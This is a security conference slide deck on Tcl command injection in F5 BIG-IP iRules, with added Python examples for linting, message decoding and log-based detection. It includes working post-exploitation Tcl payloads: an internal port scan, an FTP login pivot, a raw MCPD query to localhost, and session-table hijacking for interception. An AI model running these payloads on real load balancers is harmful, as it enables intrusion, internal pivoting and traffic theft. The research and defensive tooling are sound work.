command injection in irules loadbalancer scripts · 2019. 8. 9. · irules determine where a given...
![Page 1: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/1.jpg)
A story about how TCL interpretation works in F5 iRules and how it can be detected or exploited
COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS
Big thanks to my fellow researchers
▪ Jesper Blomström
▪ Pasi Saarinen
▪ William Söderberg
▪ Olle Segerdahl
Twitter @kuggofficial
Big thanks to David and Aaron at F5 SIRT for a good response https://support.f5.com/csp/article/K15650046
WHOAMI AND THANKS
F-SECURE IS ONE OF THE LEADING CYBER SECURITY CONSULTING PROVIDERS GLOBALLY
CLIENTS
250+ Clients
THOUGHT LEADERSHIP
300+ Publications & research released annually
ACCREDITATIONS
12 Internationally recognised
CAPABILITY
250+ Technical consultants
Security assessments
Hardware security assessments
Red teaming
Incident Management & Forensics
Development programs
Audit & analysis
Coaching & exercises
Intelligence platform
Intelligence services
TECHNICAL SECURITY SERVICES
RISK & SECURITY MANAGEMENT
CYBER INTELLIGENCE
LOAD BALANCERS
▪ Can store and handle multiple sessions for backend servers
▪ Customers write their own iRules to define the load balancer behaviour
▪ https://devcentral.f5.com is used as a ”stackoverflow for iRules”
▪ Application fluency for all major protocols.
▪ Highly programmable through iRules, iRules LX and Traffic Policies
▪ Deployable as software and hardware
▪ Scalable to Tb/s of performance and highly available for both data and control plane
▪ WAF functionality
THE F5 PRODUCTS I WILL TALK ABOUT
Internet
HTTP Server 2
BIG-IP Load balancer
HTTP Server 1
TLS
CACHING IRULE EXAMPLE
Browser / Loadbalancer / Backend webservers
GET /favicon.ico
iRule
HTTP 200 OK
FORWARDING EXAMPLE
Browser / Loadbalancer / Backend webservers
GET /index.html
iRule
HTTP 200 OK
GET /index.html
HTTP 200 OK
▪ A fork of TCL 8.4
▪ New features in TCL >8.4 are not introduced in iRule
▪ iRule has introduced a group of simplifications and exceptions to TCL
▪ Return oriented programming (with optional exception handling)
THE IRULE LANGUAGE
▪ iRules determine where a given HTTP request is forwarded to, based on a programmed logic
▪ The HTTP request header and body are parsed by the F5 iRule engine
▪ The system administrator writes F5 iRule code to handle requests
▪ Example "catch-all" redirect iRule:
TCL / IRULE BASICS
when HTTP_REQUEST {
    HTTP::redirect "/helloworld.html"
}
HTTP headers include
▪ Server: BigIP
Found in redirects
Found in favicon.ico responses
HOW TO SPOT THESE LOADBALANCERS IN THE WILD
HTTP/1.0 302 Found
Location: /helloworld.html
Server: BigIP
Connection: close
Content-Type: Text/html
Content-Length: 0
TCL SUPPORTS ARGUMENT SUBSTITUTION
▪ An argument is evaluated by breaking the command line into words and substituting each word according to how it is enclosed
COMMAND ARGUMENTS
1. command "$arg1" "$arg2" # Quoted arguments
2. command [$arg1] [$arg2] # Bracketed arguments
3. command {$arg1} {$arg2} # Braced arguments
4. command $arg1 $arg2 # Unquoted arguments
Inside double quotes ("): "Command substitution, variable substitution, and backslash substitution are performed on the characters between the quotes ..."
Inside brackets []: "If a word contains an open bracket ("[") then TCL performs command substitution."
▪ Like backticks ` in /bin/sh
QUOTED EVALUATION AND COMMAND SUBSTITUTION
Bart: Is Al there?
Moe: Al?
Bart: Yeah, Al. Last name Caholic?
Moe: Hold on, I'll check. Phone call for Al... Al Caholic. Is there an Al Caholic here?
(The guys in the pub cheer.)
THIS IS A COMMAND INJECTION
The body argument of a command invocation is a script (a list of commands) to execute if a condition is met
In these cases the value of $body is command-substituted regardless of quoting unless braces are used
ARGS AND BODY: UNQUOTED COMMAND SUBSTITUTION
command ?arg? ?body?
1. after 1 $body
2. while 1 $body
3. if 1 $body
4. switch 1 1 $body
TCL expands the value of a variable or command inside double quotes before the enclosing command runs
https://wiki.tcl-lang.org/page/Injection+Attack
set variable {This is a string}
catch "puts $variable"
When double quotes are used, TCL will substitute the content of the variables and commands
Try:
set variable {[error PWNED!]}
When the contents of $variable are substituted by TCL, the word is passed to catch as [error PWNED!] and executed. This is called double substitution
PRIOR ART: COMMAND INJECTION IN TCL 8.4
1. The word catch is resolved as a command with a ?body? argument
2. Arguments are evaluated by the TCL interpreter according to the dodecalogue, including expansion of [ ] " " { }
3. Any code within arguments starting with [ will be executed by catch
BREAKING DOWN EXECUTION
catch "puts $variable"
catch puts [error PWNED!]
error PWNED!
▪ after
▪ catch
▪ eval
▪ expr
▪ for
▪ foreach
▪ history
▪ if
▪ proc
▪ cpu
▪ string match
▪ interp
▪ namespace eval
▪ namespace inscope
▪ source
▪ switch
▪ subst
▪ time
▪ try
▪ uplevel
▪ while
▪ trace
▪ list
LIST OF BUILT-IN COMMANDS THAT CAN PERFORM COMMAND EVALUATION
DIRECT EVALUATION: EVAL, SUBST OR EXPR
subst - Perform backslash, command, and variable substitutions.
subst ?-nobackslashes? ?-nocommands? ?-novariables? string
eval, a built-in Tcl command, interprets its arguments as a script, which it then evaluates.
eval arg ?arg ...?
expr, a built-in Tcl command, interprets its arguments as a mathematical expression, which it then evaluates.
expr arg ?arg ...?
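The rule the last few slides build up to (an argument that catch, if, after, eval, subst, expr and friends will evaluate again is only safe when it is braced) can be turned into a mechanical review check. The block below is an added example written for this page, not the tclscan tool from the talk nor any F5 code: it tokenises each command line into braced, quoted and bare words and reports every script argument that is not braced. The SCRIPT_ARGS table, the SAMPLE_IRULE text and the line-at-a-time reading of the script are all assumptions of the example. The HSSR rule from the slides is scanned as well to show the limit of such a check: it comes back clean because the substitution happens inside the called library, not in the rule itself.

```python
"""Line-level check for iRule/Tcl arguments that a command will evaluate again.

A quoted or bare word is substituted once when the command line is parsed; if
the command then evaluates that word as a script (catch, if, after, eval, ...)
it is evaluated a second time, which is the double substitution from the
slides. A braced word is passed through untouched, so bracing ?body? arguments
is the fix. This is an added example in the spirit of tclscan, not tclscan.
"""
from typing import List, Tuple

# Command -> (first, last) index, among the arguments after the command name,
# of those the command evaluates as a script or expression (last=None: to the
# end). Assumed for this example from the slide's command list and the Tcl 8.4
# syntax of each command; commands not listed are ignored.
SCRIPT_ARGS = {
    "catch": (0, 1), "eval": (0, None), "expr": (0, None), "subst": (0, None),
    "after": (1, None), "while": (0, 2), "if": (0, None), "for": (0, 4),
    "foreach": (2, 3), "switch": (1, None), "uplevel": (1, None),
    "proc": (2, 3), "time": (0, 1), "try": (0, 1), "namespace": (2, None),
}
IF_KEYWORDS = {"then", "elseif", "else"}


def split_words(command: str) -> List[Tuple[str, str]]:
    """Split one Tcl command into (kind, text) words: "braced" words get no
    substitution, "quoted" and "bare" words do. Brackets inside bare words keep
    their spaces so [HTTP::header {Accept-Language}] stays one word; backslash
    escapes are skipped. A reviewer's approximation of the Tcl parser."""
    words, i, n = [], 0, len(command)
    while i < n:
        while i < n and command[i].isspace():
            i += 1
        if i >= n:
            break
        opener, depth, j = command[i], 0, i
        if opener in "{\"":
            while j < n:
                ch = command[j]
                if ch == "\\":
                    j += 2
                    continue
                if opener == "{":
                    depth += (ch == "{") - (ch == "}")
                    if depth == 0:
                        break
                elif ch == '"' and j > i:
                    break
                j += 1
            words.append(("braced" if opener == "{" else "quoted", command[i + 1:j]))
            i = j + 1
        else:
            while j < n and (depth > 0 or not command[j].isspace()):
                ch = command[j]
                if ch == "\\":
                    j += 2
                    continue
                depth += (ch == "[") - (ch == "]")
                j += 1
            words.append(("bare", command[i:j]))
            i = j
    return words


def unbraced_script_args(command: str) -> List[str]:
    """Script/expression arguments of one command that are not braced."""
    words = split_words(command)
    if not words or words[0][1] not in SCRIPT_ARGS:
        return []
    name, args = words[0][1], words[1:]
    if name in ("subst", "switch"):  # drop leading option flags such as -nocommands
        while args and args[0][0] == "bare" and args[0][1].startswith("-"):
            args = args[1:]
    first, last = SCRIPT_ARGS[name]
    return [text for idx, (kind, text) in enumerate(args)
            if idx >= first and (last is None or idx < last)
            and kind != "braced" and not (name == "if" and text in IF_KEYWORDS)]


def scan(script: str) -> List[Tuple[int, str, str]]:
    """(line, command, argument) for every unbraced script argument. Each
    non-empty, non-comment line is read as one command, the way a manual
    review reads it; continuation lines and ';' are not split further."""
    report = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        line = line.strip()
        if line and not line.startswith("#"):
            for arg in unbraced_script_args(line):
                report.append((lineno, line.split()[0], arg))
    return report


# Constructed iRule carrying the two quoting mistakes the slides describe.
SAMPLE_IRULE = '''when HTTP_REQUEST {
    set lang [HTTP::header {Accept-Language}]
    # BAD: the quoted body is substituted before catch ever sees it
    catch "log local0. $lang"
    # OK: braces hand the body to catch unchanged
    catch {log local0. $lang}
    if {$lang ne ""} "HTTP::redirect /$lang/index.html"
}'''

# The HSSR rule from the slides. The header only reaches an evaluating
# context inside the called library, so this line-level scan reports nothing
# unless /Common/HSSR itself is scanned too.
HSSR_IRULE = '''when HTTP_REQUEST {
    if {[HTTP::uri] starts_with "/index.html"} {
        set lang [HTTP::header {Accept-Language}]
        set uri http://$lang.cdn.example.com/index.html
        set status [call /Common/HSSR::http_req -uri $uri]
    }
}'''

if __name__ == "__main__":
    for lineno, cmd, arg in scan(SAMPLE_IRULE):
        print(f"line {lineno}: {cmd} argument is not braced: {arg!r}")
    print("HSSR rule findings:", scan(HSSR_IRULE))
```

The check is deliberately syntactic: it says nothing about whether the unbraced value is attacker-controlled, so every finding still needs the reviewer to trace where the variable came from (HTTP::header, HTTP::uri, a cookie, the session table). The reverse is the bigger caveat, shown by the HSSR rule: a clean scan of one iRule proves nothing about the library procedures it calls.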
IRULE BASED ON HSSR
Browser / Loadbalancer / Backend webservers
GET /index.html
iRule
HTTP 200 OK
GET /index.html
HTTP 200 OK
when HTTP_REQUEST {
    if {[HTTP::uri] starts_with "/index.html"} {
        # Accept-Language is client-controlled and goes into $uri unvalidated
        set lang [HTTP::header {Accept-Language}]
        set uri http://$lang.cdn.example.com/index.html
        # $uri is handed to the HSSR library, whose use of it is the injection point
        set status [call /Common/HSSR::http_req -uri $uri]
    }
}
HOW HSSR USES OUR $URI
1. Identify an input field that is command substituted in the iRule
Input Tcl strings in fields and header names
Look for indications that the code was executed
2. Test the injection location using the info command
3. Identify external resources to pivot to permanent access
EXPLOITATION
DEMO TIME
How do we get persistent access?
TAKING IT FURTHER
GAINING PERMANENT ACCESS USING "TABLE"
▪ A session table is a distributed and replicated key value store
▪ Commonly used to store cookie values
Notably used to avoid paying for the APM module
▪ Magically synchronized between instances using load balancing
Can be used to pivot access on multiple instances
HACKING THE SESSION TABLE
▪ With command injection it's possible to overwrite any table value
▪ table set
▪ table lookup
▪ table add
▪ table replace
▪ Overwriting another user's session (or every session) makes it possible to run code specifically for a target user
▪ Possible to sniff all http(s) traffic for any authenticated user
TABLE DEMO: HOSTED MITM
A LOOK AT THE CODE IN THE BIG-IP EDITOR
POST EXPLOITATION POSSIBILITIES
▪ Scan internal network
▪ Scan localhost
▪ Attack internal resources using the BIG-IP F5 as a pivot
Exposing the pool (backend) servers
active_nodes -list [LB::server pool]
PAYLOAD 1
PORTSCAN THE POOL SERVERS
foreach p {21 80 135 389 443 445} {catch {set c [connect 192.168.200.5:$p]; append r $p "\topen\n"; close $c}}; TCP::respond $r
LOGGING IN TO THE FTP SERVICE
catch {set c [connect 192.168.200.5:21];recv -timeout 200 $c d;recv -timeout 200 $c d;send -timeout 200 $c "USER anonymous\r";recv -timeout 200 $c d;send -timeout 200 $c "PASS [email protected]\r";recv -timeout 200 $c d;};
close $c;TCP::respond $d
ATTACK CHAIN
Browser / Loadbalancer / Protected webservers
GET /index.html
iRule
230 User logged in.
FTP request
FTP response
PAYLOAD 2: PORTSCAN LOCALHOST
PAYLOAD 3: QUERY ALL MCPD SYSTEM MODULE
set c [connect 127.0.0.1:6666];send $c {%00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d%00%00%00%0c%21%e0%00%0d%00%00%00%02%00%00%00%00%00%00};recv -timeout 10000 $c d;TCP::respond $d
MCPD EXPLANATION
%00%00%00%16 SIZE
%00%00%00%3f SEQUENCE
%00%00%00%00 REQUEST-ID
%00%00%00%02 FLAG
%0b%65 KEY (Query All)
%00%0d TYPE
%00%00%00%0c ATTRIBUTE SIZE
%21%e0 ATTRIBUTE NAME (System Module)
%00%0d%00%00%00%02%00%00%00%00 (Attribute data)
%00%00 END OF MESSAGE
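The field breakdown above can be checked mechanically. The block below is an added example, not code from the talk: it percent-decodes the message exactly as shown on the payload slide and splits it into the fields the slide names, using the slide's byte widths and verifying that the size and attribute-size fields agree with the bytes actually present. The meaning of the key and attribute-name values is taken only from the slide's labels; nothing else about the MCPD protocol is assumed, and the function name and validation rules are this example's own. For a reviewer, an iRule that opens a connection to 127.0.0.1:6666 is itself the thing to alert on; decoding the message afterwards shows what such a rule asked for.

```python
"""Decode the MCPD message from the slide into the fields the slide names.

Added example: the byte widths and field names follow the slide's own
breakdown (four big-endian 32-bit header words, then key, type, attribute
size, attribute name, attribute data and a two-byte end marker). The checks
on the two length fields are this example's own consistency rules.
"""
import struct
from urllib.parse import unquote_to_bytes

# The percent-encoded message exactly as shown on the payload slide.
SLIDE_MESSAGE = (
    "%00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d"
    "%00%00%00%0c%21%e0%00%0d%00%00%00%02%00%00%00%00%00%00"
)

HEADER_LEN = 16  # size, sequence, request-id, flag: four big-endian uint32


def decode_mcpd_message(encoded: str) -> dict:
    """Split a percent-encoded MCPD message into its fields, checking the two
    length fields against what is actually present."""
    raw = unquote_to_bytes(encoded)
    if len(raw) < HEADER_LEN:
        raise ValueError("message shorter than the 16-byte header")
    size, sequence, request_id, flag = struct.unpack(">IIII", raw[:HEADER_LEN])
    body = raw[HEADER_LEN:]
    # The slide's size field (0x16 = 22) counts the bytes after the header.
    if len(body) != size:
        raise ValueError(f"size field says {size} bytes, body has {len(body)}")
    if len(body) < 8:
        raise ValueError("body too short for key, type and attribute size")
    key, msg_type, attr_size = struct.unpack(">HHI", body[:8])
    # Attribute size (0x0c = 12) covers the 2-byte name plus 10 bytes of data.
    attr = body[8:8 + attr_size]
    if len(attr) != attr_size or attr_size < 2:
        raise ValueError(f"attribute size {attr_size} does not fit the body")
    trailer = body[8 + attr_size:]
    if trailer != b"\x00\x00":
        raise ValueError("end-of-message marker missing or extra bytes present")
    return {
        "size": size,
        "sequence": sequence,
        "request_id": request_id,
        "flag": flag,
        "key": key,                 # 0x0b65, labelled "Query All" on the slide
        "type": msg_type,
        "attribute_size": attr_size,
        "attribute_name": struct.unpack(">H", attr[:2])[0],  # 0x21e0, "System Module"
        "attribute_data": attr[2:],
    }


if __name__ == "__main__":
    for name, value in decode_mcpd_message(SLIDE_MESSAGE).items():
        print(f"{name:15} {value!r}")
```

Both length fields on the slide check out: the 22-byte size equals the body after the 16-byte header, and the 12-byte attribute size equals the 2-byte name plus the 10 bytes of attribute data, leaving exactly the two-byte end marker. A message whose lengths do not add up is rejected rather than guessed at.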
LIST USERSAND PRIVILEGES
LIST LOCAL TMSH SHELL COMMANDS (BEYOND IRULE)
1. iRule injection access
2. Query MCPD
3. Mcpd response
4. Execute MCPD tmsh command with Tcl injection
5. …
6. Local privileges
ATTACK CHAIN
DETECTION
SCANNING FOR COMMAND INJECTION WITH TCLSCAN
▪ Automated tool to find quoted and unquoted arguments
▪ It’s unmaintained Rust so I had to fix it
▪ Finds 80% of known injection vulnerabilities
▪ Get the code: https://github.com/kugg/tclscan
▪ Automated iRule injection detector scanner for Burp Suite
▪ The tool will substitute every available input field with a Tcl injection and measure the result
▪ Download iruledetector.py in the bapp-store
AUTOMATED TESTING USING IRULEDETECTOR.PY
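iruledetector.py finds the bug from the outside by sending Tcl into every field; the defender-side counterpart is to look for exactly those probes in request logs, since the exploitation slide says a tester puts Tcl strings into fields and header names and watches for signs they ran. The block below is an added example written for this page, not part of the talk's tooling or any F5 product. The log format, the sample lines, the field names and the indicator patterns are all constructed for the example: a combined-style access log with the Accept-Language and User-Agent values quoted after the status and size. Adapt LOG_RE to whatever your BIG-IP or upstream server actually logs.

```python
"""Search request logs for Tcl substitution syntax in attacker-controlled fields.

Added example: a log that keeps header values will show iRule injection probes
as bracketed commands, variable references or backslash escapes in fields
where such syntax never occurs legitimately. The format below is constructed
for this example; real deployments adapt LOG_RE to their own log format.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = r'''
203.0.113.5 - - [09/Aug/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "en-GB,en;q=0.9" "Mozilla/5.0"
203.0.113.7 - - [09/Aug/2019:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "[info tclversion]" "curl/7.64.0"
203.0.113.7 - - [09/Aug/2019:10:00:03 +0000] "GET /index.html?q=%5Binfo%20hostname%5D HTTP/1.1" 200 512 "en" "curl/7.64.0"
203.0.113.9 - - [09/Aug/2019:10:00:04 +0000] "GET /favicon.ico HTTP/1.1" 200 318 "de-DE" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [09/Aug/2019:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "$::env(HOME)" "curl/7.64.0"
'''

# source - - [timestamp] "METHOD target PROTO" status size "Accept-Language" "User-Agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<accept_language>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Tcl syntax that never belongs in a language tag or a URL path/query:
# a bracketed command word, a variable reference, or a hex backslash escape.
TCL_INDICATORS = {
    "command substitution": re.compile(r"\[\s*[A-Za-z:][^\]]*\]"),
    "variable substitution": re.compile(r"\$[A-Za-z_:{]"),
    "backslash escape": re.compile(r"\\x[0-9A-Fa-f]{2}"),
}

# Fields scored. User-Agent is parsed but deliberately left out: real browser
# strings contain brackets and would drown the result in false positives.
SCORED_FIELDS = ("target", "accept_language")


def tcl_indicators(value: str) -> List[str]:
    """Names of the Tcl syntax patterns found in one decoded field value."""
    return [name for name, rx in TCL_INDICATORS.items() if rx.search(value)]


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per (line, field) whose decoded value carries Tcl syntax."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # blank or foreign line; a real deployment would count these
        for field in SCORED_FIELDS:
            value = unquote(m.group(field))  # %5B...%5D hides [ ] in the URL
            found = tcl_indicators(value)
            if found:
                hits.append({"src": m.group("src"), "ts": m.group("ts"),
                             "field": field, "value": value,
                             "indicators": ", ".join(found)})
    return hits


def hits_per_source(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count hits by client address: repeated probes from one source stand out."""
    return dict(Counter(h["src"] for h in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["src"]} {h["field"]}={h["value"]!r}: {h["indicators"]}')
    print(hits_per_source(found))
```

The query string is percent-decoded before matching because the brackets of a bracketed command are usually encoded on the wire, which is also why a rule that matches only the raw log text misses the second probe above. Treat hits as a triage queue rather than a verdict: a hit in Accept-Language is near-certain, a hit in a URL query is worth a second look because PHP-style array parameters also use brackets.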
UNIT TESTING IRULE CODE USING TESTCL
▪ Get the code: https://github.com/landro/testcl
▪ Unit testing framework for iRule code
▪ Community driven, lacks complex support
▪ I added cookie support
▪ Good for unit testing code and finding logical vulnerabilities
▪ Tcl is an old and loosely defined language
Easy to fool
Hard to get variable assignment and substitution right
▪ Avoid the use of eval, subst and expr
▪ Take care to use {bracing} of ?body? arguments.
▪ Use iruledetector.py in Burp to find vulnerabilities
▪ Use tclscan to review code
▪ Use testcl to test your iRule logic
▪ Do manual third party code reviews
SUMMARY
THANK YOU
Browser / Loadbalancer
1. iRule injection (mcpd)
2. mcpd query
3. mcpd response
4. iRule with tmsh
5. Tcl shell response